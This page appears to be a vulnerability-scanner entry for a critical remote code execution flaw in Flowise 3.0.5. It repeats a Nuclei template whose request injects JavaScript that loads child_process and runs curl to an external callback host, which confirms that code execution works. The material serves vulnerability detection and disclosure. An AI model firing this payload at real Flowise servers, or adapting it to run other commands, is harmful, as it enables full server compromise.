Flowise - Remote Code Execution

CVE-2025-59528

Verified

Description

Flowise 3.0.5 contains a remote code execution vulnerability caused by unsafe evaluation of user input in the CustomMCP node's convertToValidJSONString function, letting remote attackers execute arbitrary code with full Node.js privileges, exploit requires user input to be processed by the vulnerable node.

Severity

Critical

CVSS Score

Exploit Probability

87%

Published Date

April 2, 2026

Template Author

xtr0nix

CVE-2025-59528.yaml

id: CVE-2025-59528

info:
  name: Flowise - Remote Code Execution
  author: xtr0nix
  severity: critical
  description: |
    Flowise 3.0.5 contains a remote code execution vulnerability caused by unsafe evaluation of user input in the CustomMCP node's convertToValidJSONString function, letting remote attackers execute arbitrary code with full Node.js privileges, exploit requires user input to be processed by the vulnerable node.
  impact: |
    Attackers can execute arbitrary code with full Node.js privileges, potentially leading to full system compromise.
  remediation: |
    Update to version 3.0.6 or later.
  reference:
    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p
    - https://nvd.nist.gov/vuln/detail/CVE-2025-59528
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-59528
    epss-score: 0.86781
    epss-percentile: 0.99437
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2025,flowise,rce,authenticated,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/v1/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"email":"{{email}}","password":"{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "id", "email", "name")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /api/v1/node-load-method/customMCP HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        x-request-from: internal

        {"loadMethod":"listActions","inputs":{"mcpServerConfig":"({x:(function(){const cp=process.mainModule.require(\"child_process\");cp.execSync(\"curl {{interactsh-url}}\");return 1;})()})"}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "No Available Actions")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402200af9be097ca099f3289235230d0dccdd4254fb7997e9e8f6406335105ba972600220276edb63a851bcfe81d689b6f5bd97cb1743fcb507596bbce33802254c9691d2:922c64590222798bb761d5b6d8e72950

10.0Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE ID:

cve-2025-59528

CWE ID:

cwe-94

References

https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p https://nvd.nist.gov/vuln/detail/CVE-2025-59528

Remediation Steps

Update to version 3.0.6 or later.

Description

id: CVE-2025-59528

info:
  name: Flowise - Remote Code Execution
  author: xtr0nix
  severity: critical
  description: |
    Flowise 3.0.5 contains a remote code execution vulnerability caused by unsafe evaluation of user input in the CustomMCP node's convertToValidJSONString function, letting remote attackers execute arbitrary code with full Node.js privileges, exploit requires user input to be processed by the vulnerable node.
  impact: |
    Attackers can execute arbitrary code with full Node.js privileges, potentially leading to full system compromise.
  remediation: |
    Update to version 3.0.6 or later.
  reference:
    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p
    - https://nvd.nist.gov/vuln/detail/CVE-2025-59528
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-59528
    epss-score: 0.86781
    epss-percentile: 0.99437
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2025,flowise,rce,authenticated,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/v1/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"email":"{{email}}","password":"{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "id", "email", "name")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /api/v1/node-load-method/customMCP HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        x-request-from: internal

        {"loadMethod":"listActions","inputs":{"mcpServerConfig":"({x:(function(){const cp=process.mainModule.require(\"child_process\");cp.execSync(\"curl {{interactsh-url}}\");return 1;})()})"}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "No Available Actions")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402200af9be097ca099f3289235230d0dccdd4254fb7997e9e8f6406335105ba972600220276edb63a851bcfe81d689b6f5bd97cb1743fcb507596bbce33802254c9691d2:922c64590222798bb761d5b6d8e72950

Flowise - Remote Code Execution

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Flowise - Remote Code Execution

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps